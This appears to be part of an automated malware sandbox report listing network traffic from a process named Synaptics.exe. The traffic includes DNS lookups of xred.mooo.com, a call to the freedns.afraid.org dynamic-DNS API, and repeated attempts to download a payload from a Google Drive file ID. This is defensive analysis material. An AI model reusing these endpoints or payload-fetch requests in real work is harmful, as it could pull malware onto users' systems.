Jul 25, 2024 22:06:11.027244091 CEST	443	49761	13.107.246.45	192.168.2.4
Jul 25, 2024 22:06:11.027282953 CEST	49761	443	192.168.2.4	13.107.246.45
Jul 25, 2024 22:06:11.049931049 CEST	443	49762	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:11.049988031 CEST	49762	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:11.051008940 CEST	443	49762	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:11.051050901 CEST	49762	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:11.054266930 CEST	49762	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:11.054274082 CEST	443	49762	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:11.054682970 CEST	443	49762	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:11.054730892 CEST	49762	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:11.055295944 CEST	49762	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:11.096540928 CEST	443	49762	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:11.439723015 CEST	443	49762	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:11.439976931 CEST	49762	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:11.440099001 CEST	49762	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:11.440169096 CEST	443	49762	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:11.440428019 CEST	443	49762	142.250.184.238	192.168.2.4
Jul 25, 2024 22:06:11.440515041 CEST	49762	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:11.440515041 CEST	49762	443	192.168.2.4	142.250.184.238
Jul 25, 2024 22:06:11.516567945 CEST	49763	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:11.516611099 CEST	443	49763	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:11.517245054 CEST	49763	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:11.517540932 CEST	49763	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:11.517554045 CEST	443	49763	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:12.210088015 CEST	443	49763	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:12.210179090 CEST	49763	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:12.211874962 CEST	49763	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:12.211884022 CEST	443	49763	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:12.212119102 CEST	443	49763	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:12.212168932 CEST	49763	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:12.212620974 CEST	49763	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:12.260494947 CEST	443	49763	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:12.659198999 CEST	443	49763	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:12.659236908 CEST	443	49763	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:12.659252882 CEST	49763	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:12.659266949 CEST	443	49763	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:12.659280062 CEST	49763	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:12.659316063 CEST	49763	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:12.660068035 CEST	49763	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:12.660090923 CEST	443	49763	142.250.185.65	192.168.2.4
Jul 25, 2024 22:06:12.660182953 CEST	49763	443	192.168.2.4	142.250.185.65
Jul 25, 2024 22:06:56.706779957 CEST	49737	80	192.168.2.4	69.42.215.252
Jul 25, 2024 22:06:57.019090891 CEST	49737	80	192.168.2.4	69.42.215.252
Jul 25, 2024 22:06:57.628341913 CEST	49737	80	192.168.2.4	69.42.215.252
Jul 25, 2024 22:06:58.831476927 CEST	49737	80	192.168.2.4	69.42.215.252
Jul 25, 2024 22:07:01.237745047 CEST	49737	80	192.168.2.4	69.42.215.252
Jul 25, 2024 22:07:06.050247908 CEST	49737	80	192.168.2.4	69.42.215.252
Jul 25, 2024 22:07:15.659769058 CEST	49737	80	192.168.2.4	69.42.215.252

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 22:05:06.562652111 CEST	61678	53	192.168.2.4	1.1.1.1
Jul 25, 2024 22:05:06.713654041 CEST	53	61678	1.1.1.1	192.168.2.4
Jul 25, 2024 22:05:06.775341988 CEST	56348	53	192.168.2.4	1.1.1.1
Jul 25, 2024 22:05:06.784046888 CEST	53	56348	1.1.1.1	192.168.2.4
Jul 25, 2024 22:06:05.523597956 CEST	57029	53	192.168.2.4	1.1.1.1
Jul 25, 2024 22:06:05.530778885 CEST	53	57029	1.1.1.1	192.168.2.4
Jul 25, 2024 22:06:06.807265997 CEST	54742	53	192.168.2.4	1.1.1.1
Jul 25, 2024 22:06:06.816375971 CEST	53	54742	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 22:05:06.562652111 CEST	192.168.2.4	1.1.1.1	0x3905	Standard query (0)	xred.mooo.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 22:05:06.775341988 CEST	192.168.2.4	1.1.1.1	0x9a89	Standard query (0)	freedns.afraid.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 22:06:05.523597956 CEST	192.168.2.4	1.1.1.1	0x218b	Standard query (0)	docs.google.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 22:06:06.807265997 CEST	192.168.2.4	1.1.1.1	0xad85	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 22:05:06.713654041 CEST	1.1.1.1	192.168.2.4	0x3905	Name error (3)	xred.mooo.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 22:05:06.784046888 CEST	1.1.1.1	192.168.2.4	0x9a89	No error (0)	freedns.afraid.org		69.42.215.252	A (IP address)	IN (0x0001)	false
Jul 25, 2024 22:06:05.530778885 CEST	1.1.1.1	192.168.2.4	0x218b	No error (0)	docs.google.com		142.250.184.238	A (IP address)	IN (0x0001)	false
Jul 25, 2024 22:06:06.816375971 CEST	1.1.1.1	192.168.2.4	0xad85	No error (0)	drive.usercontent.google.com		142.250.185.65	A (IP address)	IN (0x0001)	false
Jul 25, 2024 22:06:09.880029917 CEST	1.1.1.1	192.168.2.4	0xc82b	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 22:06:09.880029917 CEST	1.1.1.1	192.168.2.4	0xc82b	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

docs.google.com

drive.usercontent.google.com

otelrules.azureedge.net

freedns.afraid.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	69.42.215.252	80	7108	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 22:05:06.800713062 CEST	154	OUT	GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 User-Agent: MyApp Host: freedns.afraid.org Cache-Control: no-cache
Jul 25, 2024 22:05:07.404668093 CEST	243	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Jul 2024 20:05:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Cache: MISS Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fERROR: Could not authenticate.0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49756	142.250.184.238	443	7108	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 20:06:06 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-07-25 20:06:06 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 25 Jul 2024 20:06:06 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-hudkhnBE3HPdGn9hhKz1Tg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49757	142.250.185.65	443	7108	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 20:06:07 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-07-25 20:06:07 UTC	1592	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 25 Jul 2024 20:06:07 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'report-sample' 'nonce-Q-KpEl70Z8ceTtUe_U-h3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1642 X-GUploader-UploadID: AHxI1nOVQ6Ad7kc-N3ZS3DvZggDNSPXEh-0FYI4q8zVfxEDRBHZ7r-2vrpIdCLkQ3EWGn2IGXTURPcZtkw Server: UploadServer Set-Cookie: NID=516=rLIGCwhfhccMs_KSCkgwm6asgGv1ypQ82fm4AXVpWmUNwlgX8xjjo7mOaUVbWvbxd5eaVKmAbFmue6XXkzvGX2w8irE5piYBJdMw-BDtlLU9Tf8bA3EgJECtydIf1vkhdsuDe4uJnmT0Di_zr5t7NVxZmskJGf1D6wAlDUeS0UY; expires=Fri, 24-Jan-2025 20:06:07 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-07-25 20:06:07 UTC	1592	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 6e 36 35 41 70 69 76 2d 62 4f 67 65 6c 4f 55 39 58 54 6f 51 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 Data Ascii: <html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Un65Apiv-bOgelOU9XToQw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-seri
2024-07-25 20:06:07 UTC	50	IN	Data Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: is server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49758	142.250.184.238	443	7108	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 20:06:08 UTC	332	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=516=rLIGCwhfhccMs_KSCkgwm6asgGv1ypQ82fm4AXVpWmUNwlgX8xjjo7mOaUVbWvbxd5eaVKmAbFmue6XXkzvGX2w8irE5piYBJdMw-BDtlLU9Tf8bA3EgJECtydIf1vkhdsuDe4uJnmT0Di_zr5t7NVxZmskJGf1D6wAlDUeS0UY
2024-07-25 20:06:09 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 25 Jul 2024 20:06:08 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-iA6vFvHDk81911P0FUEifQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49759	142.250.185.65	443	7108	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 20:06:09 UTC	375	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=516=rLIGCwhfhccMs_KSCkgwm6asgGv1ypQ82fm4AXVpWmUNwlgX8xjjo7mOaUVbWvbxd5eaVKmAbFmue6XXkzvGX2w8irE5piYBJdMw-BDtlLU9Tf8bA3EgJECtydIf1vkhdsuDe4uJnmT0Di_zr5t7NVxZmskJGf1D6wAlDUeS0UY
2024-07-25 20:06:10 UTC	1253	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 25 Jul 2024 20:06:09 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-996CPecssUltDuB5_iNHfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1642 X-GUploader-UploadID: AHxI1nO_fflvwe6c8W4XxWG1P4JvlatE11JCTgJYmc0QZrZS8WfGePwmCoVcmeOkHdEHw2YaE6Sxug__0Q Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-07-25 20:06:10 UTC	137	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-07-25 20:06:10 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 2d 52 63 35 5a 36 6f 57 62 4c 4d 66 47 4a 57 53 67 35 39 32 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="A-Rc5Z6oWbLMfGJWSg592w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-07-25 20:06:10 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49760	13.107.246.45	443	4924	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
2024-07-25 20:06:10 UTC	208	OUT	GET /rules/rule170012v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-07-25 20:06:10 UTC	584	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 20:06:10 GMT Content-Type: text/xml Content-Length: 1523 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:33 GMT ETag: "0x8DC582BD969CD29" x-ms-request-id: f26ab83d-201e-0051-496c-de7340000000 x-ms-version: 2018-03-28 x-azure-ref: 20240725T200610Z-15c77d89844d9pv5vk6xmbvv7400000000eg00000000rwve x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-07-25 20:06:10 UTC	1523	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 37 30 30 31 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 47 72 61 70 68 69 63 73 2e 47 56 69 7a 49 6e 6b 53 74 72 6f 6b 65 22 20 41 54 54 3d 22 63 66 63 66 64 62 39 31 63 36 38 63 34 33 32 39 62 62 38 62 37 63 62 37 62 61 62 62 33 63 66 37 2d 65 30 38 32 63 32 66 32 2d 65 66 31 64 2d 34 32 37 61 2d 61 63 34 64 2d 62 30 62 37 30 30 61 66 65 37 61 37 2d 37 36 35 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="170012" V="10" DC="SM" EN="Office.Graphics.GVizInkStroke" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" SP="CriticalBusinessImpact" DCa="PSU" xmlns=""> <S> <UTS T

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49761	13.107.246.45	443	4924	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
2024-07-25 20:06:10 UTC	206	OUT	GET /rules/rule63067v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-07-25 20:06:11 UTC	584	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 20:06:10 GMT Content-Type: text/xml Content-Length: 2871 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:05 GMT ETag: "0x8DC582BEC5E84E0" x-ms-request-id: dd65daab-901e-0083-636c-debb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20240725T200610Z-15c77d89844fw8hl33t201z4f400000000hg00000000smy3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-07-25 20:06:11 UTC	2871	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 36 33 30 36 37 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 49 64 65 6e 74 69 74 79 2e 53 73 70 69 50 72 6f 6d 70 74 57 69 6e 33 32 22 20 41 54 54 3d 22 35 63 36 35 62 62 63 34 65 64 62 66 34 38 30 64 39 36 33 37 61 63 65 30 34 64 36 32 62 64 39 38 2d 31 32 38 34 34 38 39 33 2d 38 61 62 39 2d 34 64 64 65 2d 62 38 35 30 2d 35 36 31 32 63 62 31 32 65 30 66 32 2d 37 38 32 32 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="63067" V="4" DC="SM" EN="Office.Identity.SspiPromptWin32" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <S>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49762	142.250.184.238	443	7108	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 20:06:11 UTC	332	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=516=rLIGCwhfhccMs_KSCkgwm6asgGv1ypQ82fm4AXVpWmUNwlgX8xjjo7mOaUVbWvbxd5eaVKmAbFmue6XXkzvGX2w8irE5piYBJdMw-BDtlLU9Tf8bA3EgJECtydIf1vkhdsuDe4uJnmT0Di_zr5t7NVxZmskJGf1D6wAlDUeS0UY
2024-07-25 20:06:11 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 25 Jul 2024 20:06:11 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-rxUcIuuDC_d7nFEhwYRXGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49763	142.250.185.65	443	7108	C:\ProgramData\Synaptics\Synaptics.exe

